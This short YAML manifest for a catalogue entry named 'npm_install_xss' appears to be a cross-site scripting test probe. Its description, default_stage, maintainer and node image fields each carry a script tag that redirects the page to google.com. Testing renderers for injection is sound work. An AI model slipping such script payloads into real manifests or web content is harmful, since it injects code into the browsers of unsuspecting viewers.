name: npm_install_xss
description: <script>document.location.href="https://google.com";</script>
default_stage: <script>document.location.href="https://google.com";</script>
icon: 🧪
maintainer: <script>document.location.href="https://google.com";</script>
license: MIT
images:
    "node": <script>document.location.href="https://google.com";</script>
tools:
labels:
    - GitLab
    - Utilities
    - NPM
